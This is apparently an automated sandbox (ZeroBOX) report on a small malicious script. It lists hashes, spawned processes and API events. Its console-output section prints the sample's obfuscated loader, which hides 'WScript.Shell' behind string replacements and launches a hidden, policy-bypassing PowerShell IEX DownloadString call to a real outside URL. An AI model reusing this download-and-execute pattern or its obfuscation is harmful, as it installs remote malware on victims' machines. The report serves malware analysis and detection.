Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Sept. 20, 2023, 6:02 p.m.	Sept. 20, 2023, 6:04 p.m.

Size	874.0B
Type	ASCII text, with very long lines, with CRLF line terminators
MD5	`4735c60f2a61a338443ce8091601ca23`
SHA256	`d5791b254c0c6021d50f3ba74eb2f6409c9c34a72c0eb4ba4870582647fe09ed`
CRC32	`C1C3B3BE`
ssdeep	`24:DTTTTTTTTTjNpM2IUvUrdorqDXq3C3dFF8GJBRqjJTC:DTTTTTTTTTj9QQUeC3LTPWO`
Yara	None matched

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\hh.txt.ps1
3044
- replace.exe "C:\Windows\system32\replace.exe" "RPVBAJNLIHYAZIPXCVGSETWSVAMBOXHJBDLZTXPIGJNOIHTALPEYKTHCXRDBCOMFZXYDEWBCSGHUPWKOYAZIPXCVGSRNXWOBZIPVMLTZPKYNOGTENLSKBWPITENLSKBWPI RPVBAJNLIH w" YAZIPXCVGS s
  1780
- replace.exe "C:\Windows\system32\replace.exe" "No files replaced" ETWSVAMBOX c
  2160
- replace.exe "C:\Windows\system32\replace.exe" "No files replaced" HJBDLZTXPI r
  2392
- replace.exe "C:\Windows\system32\replace.exe" "No files replaced" GJNOIHTALP i
  2512
- replace.exe "C:\Windows\system32\replace.exe" "No files replaced" EYKTHCXRDB p
  1628
- replace.exe "C:\Windows\system32\replace.exe" "No files replaced" COMFZXYDEW t
  236
- replace.exe "C:\Windows\system32\replace.exe" "No files replaced" BCSGHUPWKO .
  1324
- replace.exe "C:\Windows\system32\replace.exe" "No files replaced" RNXWOBZIPV h
  572
- replace.exe "C:\Windows\system32\replace.exe" "No files replaced" MLTZPKYNOG e
  2564
- replace.exe "C:\Windows\system32\replace.exe" "No files replaced" TENLSKBWPI l
  2644
- replace.exe "C:\Windows\system32\replace.exe" "No files replaced"
  2520

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Command line console output was observed (50 out of 52 events)

Time & API	Arguments	Status	Return
WriteConsoleW Sept. 20, 2023, 6:02 p.m.	buffer: Set-Variable : A positional parameter cannot be found that accepts argument 'Cr console_handle: 0x00000023	1	1
WriteConsoleW Sept. 20, 2023, 6:02 p.m.	buffer: eateObject'. console_handle: 0x0000002f	1	1
WriteConsoleW Sept. 20, 2023, 6:02 p.m.	buffer: At C:\Users\test22\AppData\Local\Temp\hh.txt.ps1:1 char:4 console_handle: 0x0000003b	1	1
WriteConsoleW Sept. 20, 2023, 6:02 p.m.	buffer: + Set <<<< PAUIKBFGLW = CreateObject(Replace(Replace(Replace(Replace(Replace(R console_handle: 0x00000047	1	1
WriteConsoleW Sept. 20, 2023, 6:02 p.m.	buffer: eplace(Replace(Replace(Replace(Replace(Replace("RPVBAJNLIHYAZIPXCVGSETWSVAMBOXH console_handle: 0x00000053	1	1
WriteConsoleW Sept. 20, 2023, 6:02 p.m.	buffer: JBDLZTXPIGJNOIHTALPEYKTHCXRDBCOMFZXYDEWBCSGHUPWKOYAZIPXCVGSRNXWOBZIPVMLTZPKYNOG console_handle: 0x0000005f	1	1
WriteConsoleW Sept. 20, 2023, 6:02 p.m.	buffer: TENLSKBWPITENLSKBWPI", "RPVBAJNLIH", "w"), "YAZIPXCVGS", "s"), "ETWSVAMBOX", "c console_handle: 0x0000006b	1	1
WriteConsoleW Sept. 20, 2023, 6:02 p.m.	buffer: "), "HJBDLZTXPI", "r"), "GJNOIHTALP", "i"), "EYKTHCXRDB", "p"), "COMFZXYDEW", " console_handle: 0x00000077	1	1
WriteConsoleW Sept. 20, 2023, 6:02 p.m.	buffer: t"), "BCSGHUPWKO", "."), "RNXWOBZIPV", "h"), "MLTZPKYNOG", "e"), "TENLSKBWPI", console_handle: 0x00000083	1	1
WriteConsoleW Sept. 20, 2023, 6:02 p.m.	buffer: "l")) console_handle: 0x0000008f	1	1
WriteConsoleW Sept. 20, 2023, 6:02 p.m.	buffer: + CategoryInfo : InvalidArgument: (:) [Set-Variable], ParameterBi console_handle: 0x0000009b	1	1
WriteConsoleW Sept. 20, 2023, 6:02 p.m.	buffer: ndingException console_handle: 0x000000a7	1	1
WriteConsoleW Sept. 20, 2023, 6:02 p.m.	buffer: + FullyQualifiedErrorId : PositionalParameterNotFound,Microsoft.PowerShell console_handle: 0x000000b3	1	1
WriteConsoleW Sept. 20, 2023, 6:02 p.m.	buffer: .Commands.SetVariableCommand console_handle: 0x000000bf	1	1
WriteConsoleW Sept. 20, 2023, 6:02 p.m.	buffer: The term 'XQPHCFZTOI' is not recognized as the name of a cmdlet, function, scri console_handle: 0x000000df	1	1
WriteConsoleW Sept. 20, 2023, 6:02 p.m.	buffer: pt file, or operable program. Check the spelling of the name, or if a path was console_handle: 0x000000eb	1	1
WriteConsoleW Sept. 20, 2023, 6:02 p.m.	buffer: included, verify that the path is correct and try again. console_handle: 0x000000f7	1	1
WriteConsoleW Sept. 20, 2023, 6:02 p.m.	buffer: At C:\Users\test22\AppData\Local\Temp\hh.txt.ps1:2 char:11 console_handle: 0x00000103	1	1
WriteConsoleW Sept. 20, 2023, 6:02 p.m.	buffer: + XQPHCFZTOI <<<< = ("POWeRS") console_handle: 0x0000010f	1	1
WriteConsoleW Sept. 20, 2023, 6:02 p.m.	buffer: + CategoryInfo : ObjectNotFound: (XQPHCFZTOI:String) [], CommandN console_handle: 0x0000011b	1	1
WriteConsoleW Sept. 20, 2023, 6:02 p.m.	buffer: otFoundException console_handle: 0x00000127	1	1
WriteConsoleW Sept. 20, 2023, 6:02 p.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000133	1	1
WriteConsoleW Sept. 20, 2023, 6:02 p.m.	buffer: The term 'PAUIKBFGLW.Run' is not recognized as the name of a cmdlet, function, console_handle: 0x00000023	1	1
WriteConsoleW Sept. 20, 2023, 6:02 p.m.	buffer: script file, or operable program. Check the spelling of the name, or if a path console_handle: 0x0000002f	1	1
WriteConsoleW Sept. 20, 2023, 6:02 p.m.	buffer: was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW Sept. 20, 2023, 6:02 p.m.	buffer: At C:\Users\test22\AppData\Local\Temp\hh.txt.ps1:3 char:15 console_handle: 0x00000047	1	1
WriteConsoleW Sept. 20, 2023, 6:02 p.m.	buffer: + PAUIKBFGLW.Run <<<< ((XQPHCFZTOI)+"HeLL.eXe -WIND HIDDeN -eXeC BYPASS -NONI $ console_handle: 0x00000053	1	1
WriteConsoleW Sept. 20, 2023, 6:02 p.m.	buffer: YSCOKHIUVP='IeX(NeW-OBJeCT NeT.W';$VFJHLBASEW='eBCLIeNT).DOWNLO';Sleep 2;[BYTe[ console_handle: 0x0000005f	1	1
WriteConsoleW Sept. 20, 2023, 6:02 p.m.	buffer: ]];Sleep 3;$DBMIPHQXFL='CKHTMIUJQE(''https://sygnifyme.com/wp-content/plugins/j console_handle: 0x0000006b	1	1
WriteConsoleW Sept. 20, 2023, 6:02 p.m.	buffer: etpack/Flag.SVG'')'.RePLACe('CKHTMIUJQE','ADSTRING');Sleep 1;IeX($YSCOKHIUVP+$V console_handle: 0x00000077	1	1
WriteConsoleW Sept. 20, 2023, 6:02 p.m.	buffer: FJHLBASEW+$DBMIPHQXFL);"), CONSOLE_HIDE, CMD_WAIT console_handle: 0x00000083	1	1
WriteConsoleW Sept. 20, 2023, 6:02 p.m.	buffer: + CategoryInfo : ObjectNotFound: (PAUIKBFGLW.Run:String) [], Comm console_handle: 0x0000008f	1	1
WriteConsoleW Sept. 20, 2023, 6:02 p.m.	buffer: andNotFoundException console_handle: 0x0000009b	1	1
WriteConsoleW Sept. 20, 2023, 6:02 p.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x000000a7	1	1
WriteConsoleW Sept. 20, 2023, 6:02 p.m.	buffer: Set-Variable : A positional parameter cannot be found that accepts argument 'No console_handle: 0x000000c7	1	1
WriteConsoleW Sept. 20, 2023, 6:02 p.m.	buffer: thing'. console_handle: 0x000000d3	1	1
WriteConsoleW Sept. 20, 2023, 6:02 p.m.	buffer: At C:\Users\test22\AppData\Local\Temp\hh.txt.ps1:4 char:4 console_handle: 0x000000df	1	1
WriteConsoleW Sept. 20, 2023, 6:02 p.m.	buffer: + Set <<<< ali = Nothing console_handle: 0x000000eb	1	1
WriteConsoleW Sept. 20, 2023, 6:02 p.m.	buffer: + CategoryInfo : InvalidArgument: (:) [Set-Variable], ParameterBi console_handle: 0x000000f7	1	1
WriteConsoleW Sept. 20, 2023, 6:02 p.m.	buffer: ndingException console_handle: 0x00000103	1	1
WriteConsoleW Sept. 20, 2023, 6:02 p.m.	buffer: + FullyQualifiedErrorId : PositionalParameterNotFound,Microsoft.PowerShell console_handle: 0x0000010f	1	1
WriteConsoleW Sept. 20, 2023, 6:02 p.m.	buffer: .Commands.SetVariableCommand console_handle: 0x0000011b	1	1
WriteConsoleW Sept. 20, 2023, 6:02 p.m.	buffer: Invalid switch - s console_handle: 0x00000013	1	1
WriteConsoleW Sept. 20, 2023, 6:02 p.m.	buffer: Invalid switch - c console_handle: 0x00000013	1	1
WriteConsoleW Sept. 20, 2023, 6:02 p.m.	buffer: Invalid switch - r console_handle: 0x00000013	1	1
WriteConsoleW Sept. 20, 2023, 6:02 p.m.	buffer: Invalid switch - i console_handle: 0x00000013	1	1
WriteConsoleW Sept. 20, 2023, 6:02 p.m.	buffer: Invalid switch - p console_handle: 0x00000013	1	1
WriteConsoleW Sept. 20, 2023, 6:02 p.m.	buffer: Invalid switch - t console_handle: 0x00000013	1	1
WriteConsoleW Sept. 20, 2023, 6:02 p.m.	buffer: Invalid switch - . console_handle: 0x00000013	1	1
WriteConsoleW Sept. 20, 2023, 6:02 p.m.	buffer: Invalid switch - h console_handle: 0x00000013	1	1

Uses Windows APIs to generate a cryptographic key (8 events)

Time & API	Arguments	Status	Return
CryptExportKey Sept. 20, 2023, 6:02 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067c890 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 20, 2023, 6:02 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067c890 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 20, 2023, 6:02 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067c890 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 20, 2023, 6:02 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067c890 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 20, 2023, 6:02 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067c890 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 20, 2023, 6:02 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067c890 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 20, 2023, 6:02 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067c890 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 20, 2023, 6:02 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067c890 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 20, 2023, 6:02 p.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (17 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Sept. 20, 2023, 6:02 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0272b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 20, 2023, 6:02 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0273f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 20, 2023, 6:02 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02709000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 20, 2023, 6:02 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06540000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 20, 2023, 6:02 p.m.	process_identifier: 3044 region_size: 786432 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x065a0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 20, 2023, 6:02 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06620000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 20, 2023, 6:02 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06621000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 20, 2023, 6:02 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06622000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 20, 2023, 6:02 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06623000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 20, 2023, 6:02 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06541000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 20, 2023, 6:02 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06542000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 20, 2023, 6:02 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06543000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 20, 2023, 6:02 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06544000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 20, 2023, 6:02 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06624000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 20, 2023, 6:02 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06625000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 20, 2023, 6:02 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06545000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 20, 2023, 6:02 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05760000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

One or more non-whitelisted processes were created (11 events)

parent_process	powershell.exe	martian_process	"C:\Windows\system32\replace.exe" "No files replaced" ETWSVAMBOX c
parent_process	powershell.exe	martian_process	"C:\Windows\system32\replace.exe" "No files replaced" RNXWOBZIPV h
parent_process	powershell.exe	martian_process	"C:\Windows\system32\replace.exe" "RPVBAJNLIHYAZIPXCVGSETWSVAMBOXHJBDLZTXPIGJNOIHTALPEYKTHCXRDBCOMFZXYDEWBCSGHUPWKOYAZIPXCVGSRNXWOBZIPVMLTZPKYNOGTENLSKBWPITENLSKBWPI RPVBAJNLIH w" YAZIPXCVGS s
parent_process	powershell.exe	martian_process	"C:\Windows\system32\replace.exe" "No files replaced"
parent_process	powershell.exe	martian_process	"C:\Windows\system32\replace.exe" "No files replaced" COMFZXYDEW t
parent_process	powershell.exe	martian_process	"C:\Windows\system32\replace.exe" "No files replaced" TENLSKBWPI l
parent_process	powershell.exe	martian_process	"C:\Windows\system32\replace.exe" "No files replaced" GJNOIHTALP i
parent_process	powershell.exe	martian_process	"C:\Windows\system32\replace.exe" "No files replaced" EYKTHCXRDB p
parent_process	powershell.exe	martian_process	"C:\Windows\system32\replace.exe" "No files replaced" HJBDLZTXPI r
parent_process	powershell.exe	martian_process	"C:\Windows\system32\replace.exe" "No files replaced" BCSGHUPWKO .
parent_process	powershell.exe	martian_process	"C:\Windows\system32\replace.exe" "No files replaced" MLTZPKYNOG e

The process powershell.exe wrote an executable file to disk (1 event)

file	C:\Windows\System32\replace.exe

hh.txt.ps1

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All